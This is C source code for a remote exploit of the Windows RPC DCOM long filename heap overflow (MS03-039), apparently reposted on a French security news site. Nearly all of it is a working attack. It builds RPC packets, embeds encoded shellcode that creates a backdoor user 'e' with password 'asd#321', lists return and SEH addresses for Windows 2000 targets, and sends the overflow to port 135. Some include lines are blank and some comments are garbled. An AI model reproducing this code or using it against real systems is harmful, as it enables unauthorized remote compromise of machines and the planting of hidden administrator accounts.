Windows RPC DCOM long filename heap overflow Exploit (MS03-039)

    
#include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 

                              #pragma comment(lib,"ws2_32")

                              unsigned char bindstr[]={
                              0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
                              0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
                              0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
                              0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
                              0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

                              unsigned char request1[]={
                              0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
                              ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
                              ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
                              ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
                              ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
                              ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
                              ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
                              ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
                              ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
                              ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
                              ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
                              ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
                              ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
                              ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
                              ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
                              ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
                              ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
                              ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
                              ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
                              ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
                              ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
                              ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
                              ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
                              ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
                              ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
                              ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
                              ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00};

                              unsigned char request2[]={
                              0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
                              ,0x00,0x00,0x5C,0x00,0x5C,0x00};

                              unsigned char request3[]={
                              0x5C,0x00
                              ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
                              ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
                              ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
                              ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

                              //user="e" pass="asd#321"
                              unsigned char sc_add_user[]=
                              "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"
                              "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
                              "\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
                              "\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
                              "\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
                              "\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
                              "\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
                              "\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
                              "\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
                              "\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
                              "\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
                              "\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
                              "\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
                              "\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
                              "\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
                              "\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
                              "\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
                              "\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
                              "\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
                              "\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";
                              #define sc_offset               0x24
                              #define sc_max                  0x208
                              #define jmp_addr_offset sc_max+sc_offset+0x8
                              #define top_seh_offset  jmp_addr_offset+0x4

                              unsigned char sc[]=
                              "\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00"
                              "\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00"
                              "\x43\x00\x24\x00\x5c\x00"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "\xe9\xf3\xfd\xff\xff"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";

                              unsigned char request4[]={
                              0x01,0x10
                              ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
                              ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
                              ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              };

                              struct
                              {
                              char    *os;
                              DWORD   dwTopSeh;
                              char    *seh;
                              DWORD   dwJmpAddr;
                              char    *jmp;
                              }
                              targets[] =
                              {
                              { "2kEnSp4+MS03-026", 
                              0x7c54144c,
                              "kernel32.dll v5.0.2195.6688",
                              0x77a1b496,
                              "OLEAUT32.dll v2.40.4522.0"},
                              { "2kEnSp3+SomeHotFixs+MS03-026", 
                              0x77eda1f0,
                              "kernel32.dll v5.0.2195.6079",
                              0x77a1afa9,
                              "OLEAUT32.dll v2.40.4518.0"}
                              }, v;
                              void main(int argc,char ** argv)
                              {
                              WSADATA WSAData;
                              SOCKET sock;
                              int len,len1;
                              SOCKADDR_IN addr_in;
                              short port=135;
                              unsigned char buf1[0x1000];
                              unsigned char buf2[0x1000];
                              int     i, iType;

                              printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
                              "Base on flashsky's MS03-026 exp\n"
                              "Code by ey4s\n"
                              "2003-09-16\n"
                              "Welcome to http://www.xfocus.net\n"
                              "Thanks to flashsky & benjurry & Dave Aitel\n"
                              "If success, target will add a user \"e\" and password is \"asd#321\"\n\n");

                              if(argc!=3)
                              {
                              printf("Usage: %s  \n", argv[0]);
                              for(i = 0; i < sizeof(targets)/sizeof(v); i++)
                              printf( "<%d>   %s\n"
                                        "      TopSeh=0x%.8x in %s\n"
                                        "      JmpAddr=0x%.8x in %s\n",
                                        i, targets[i].os,
                                        targets[i].dwTopSeh, targets[i].seh,
                                        targets[i].dwJmpAddr, targets[i].jmp);
                              return;
                              }

                              iType = atoi(argv[2]);
                              if((iType<0) || iType > sizeof(targets)/sizeof(v))
                              {
                              printf("[-] Wrong type.\n");
                              return;
                              }

                              memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
                              memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);
                              memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);
                              printf("[+] Prepare shellcode completed.\n");

                              if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
                              {
                              printf("WSAStartup error.Error:%d\n",WSAGetLastError());
                              return;
                              }

                              addr_in.sin_family=AF_INET;
                              addr_in.sin_port=htons(port);
                              addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

                              if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
                              {
                              printf("Socket failed.Error:%d\n",WSAGetLastError());
                              return;
                              }
                              if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
                              {
                              printf("Connect failed.Error:%d",WSAGetLastError());
                              return;
                              }
                              printf("[+] Connect to %s:135 success.\n", argv[1]);

                              if(sizeof(sc_add_user) > sc_max)
                              {
                              printf("[-] shellcode too long, exit.\n");
                              return;
                              }


                              len=sizeof(sc);
                              memcpy(buf2,request1,sizeof(request1));
                              len1=sizeof(request1);
                              *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;  //ļ˫ֽڳ
                              *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//ļ˫ֽڳ
                              memcpy(buf2+len1,request2,sizeof(request2));
                              len1=len1+sizeof(request2);
                              memcpy(buf2+len1,sc,sizeof(sc));
                              len1=len1+sizeof(sc);
                              memcpy(buf2+len1,request3,sizeof(request3));
                              len1=len1+sizeof(request3);
                              memcpy(buf2+len1,request4,sizeof(request4));
                              len1=len1+sizeof(request4);
                              *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
                              //ֽṹij
                              *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  
                              *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
                              *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
                              *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
                              *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
                              *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
                              *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;

                              len = send(sock,bindstr,sizeof(bindstr),0);
                              if(len<=0)
                              {
                              printf("[-] Send failed.Error:%d\n",WSAGetLastError());
                              return;
                              }
                              else
                              printf("[+] send %d bytes.\n", len);

                              len=recv(sock,buf1,1000,0);
                              if(len<=0)
                              {
                              printf("[-] recv error:%d\n", GetLastError());
                              return;
                              }
                              else
                              printf("[+] recv %d bytes.\n", len);

                              len = send(sock,buf2,len1,0);
                              if(len<=0)
                              {
                              printf("[-] Send failed.Error:%d\n",WSAGetLastError());
                              return;
                              }
                              else
                              printf("[+] send %d bytes.\n", len);
                              len=recv(sock,buf1,1024,0);
                              if(len<=0)
                              {
                              printf("[+] Target crash or exploit success? :)\n");
                              }
                              else
                              printf("[-] recv %d bytes. Bad luck!\n", len);
                              }
                              

 Audits de Scurit & Tests Intrusifs F-VNS Security  Mailing Listes Advisories  Service Publicitaire

Tous droits rservs 2002-2004 K-OTiK Security Voir Notice Lgale

actualit informatique Exploits